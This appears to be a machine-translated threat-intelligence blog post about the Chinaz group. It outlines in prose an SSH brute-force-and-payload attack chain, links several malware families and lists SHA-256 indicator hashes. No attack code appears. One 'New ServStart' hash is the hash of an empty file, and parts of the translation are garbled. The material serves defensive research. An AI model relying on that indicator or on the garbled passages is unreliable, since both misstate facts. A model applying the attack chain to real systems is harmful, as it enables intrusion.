When it comes to Chinaz, let's first state that this is not the name of the webmaster's house. In view of my awe for internal technology, I can be sure that this is a well-known Mafia Gang, a Mafia gang that is keen to use old loopholes and password blasting to launch xorddos and Bill Gates.

Related links:

http://blog.malwaremustdie.org/2015/01/mmd-0030-2015-new-elf-malware-on.html

http://blog.malwaremustdie.org/2015/08/mmd-0039-2015-chinaz-made-new-malware.html

The following is a series of explosion attacks captured by intezer's honeypot. After entering through SSH \ telnet brute force attack, first close the firewall, then download the payload, set permissions, and then run the payload

The downloaded script is located in the HFS panel below

The Linux sample in the panel above is a BillGates variant

PE is a ghost variant, so C2 is the same

By querying the history of the domain name and resolving the IP address, you can find some traces of websites passed by the organization, such as

A day later, the panel uploaded a new sample for the ddosclient family

In rar is the wolf

Other HFS panels can be found through the passive resolution IP just discovered by vt

Port scan tool

Find the HFS server of Chinaz through Shodan. The rules can be referred to

In the original text, Intel also classified nitol remote control as an organization, and then made a strong correlation with mrblack, Chinaz and nitol, and then it also involved our big Iron Tiger organization. If you are interested, you can see the code comparison at the back of the original text.

Original words:

Chinaz is hosting instances of the Linux and windows versions of mrblack, which have shown a code reuse connection to the older version of servstart. In addition, we found that a newer version of servstart is hosted with the mrblack Linux instance. Therefore, there may be a relationship between mrblack and servstart actors, indicating a potential relationship between Chinaz and the nitol family.

In addition, Chinaz windows components have been found to be infected with nitol components, indicating that these participants may have been running on servers that have been infected with nitol. This forces the assumption that there may be a deeper relationship between the two threat groups. Chinaz has always been a relatively active group of threat actors. Even though there have been many changes in its overall infrastructure from the early stage, its complexity is slowly developing. To reflect the most relevant relationships discussed in this blog, we decided to present them using the following chart:

Original link

https://www.intezer.com/blog-chinaz-relations/

IOCs

ChinaZ Gh0st RAT variant with ‘Mother360’ key:

A9c54bdba780bcdc34f15b62f0ac1da8bcf4d65b4587d0d95bd2a9b5be5dfee6

908d817f81f9276f5afad1a33a7e2de7566fd5c967ad95782a4d904ca0e5efdd

9e24ba7304ae7c4f153fa8e97d2e6779d0e4377cee270b83d20d91afef7fe6f4

Tiger APT gh0st RAT:

D4262bbfe779d18b83b950bb993d3d46154bf1da5a4868ff6fa3e54c167eed71

BillGates:

92c191c41bcc701de5d633a0edb8cab6085ea13ede079651a2cc4a4ae54b29bb

6fd7aab3faabd5f071d1bc9bb039146c01acf67d941c24e99813b1375114e908

Infected ChinaZ DDoS tools with Nitol: B883b32264bcafd0c5ede5ff7399388feb51dbdf183f7ad52024c08cd221d574

23c69edc4695f6c2184484682757f024f0e20573dba599030fde1cdaeae9915c

ChinaZ.DDoSClient:

80952e211eb98773909f0f3e7ce783ce2f410327058a4760efad2ff0dbebcb88

D97ffba4169df8b206f6fc588ba594e84539b321fae9247723d6b42940116fa5

A8d0928098cc43e7b9e8ba3b03507d342489dea832816dfc083c356b346f8a3d

7495be154047e2c3c3b9735d61c6f1256eea776eb536e42f2ea76d5c11fc7f84

Win32/MrBlack:

D793e629df1b73b054f763106fcfedaaafadd8a0919192fc7d1925752a1d64fe

Linux/MrBlack:

F025b6d531e7dcba68a309636f622fbe8ee212d457c9cc00e7bf339dca65fec2

Fb69075f4383f3537af46d2098b3bcdcb7c1bdd6896c580cd9ead6f56fb5219c

ServStart:

4f4f24f0333ed6e8883971129f216fab608b6e4d0c97c58a2b3b6a1106c77bf7

7db53e95a1339d4d023d61087907a5b07bf6720a2dd88b12882a2c5c201a92ea

7e6a2448e06a1d97ff317a5dc4ed969cef077a3568fd214cbe61854b7ff1a6d1

New ServStart:

774af1499fa1558d0b31272b84b4fbbfcc6fea578898325610524aa3853b669d

E3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

D104daec5e990de0233efdde8747a1d829c90b7b9a2169a7bcf5744fa1d95e6e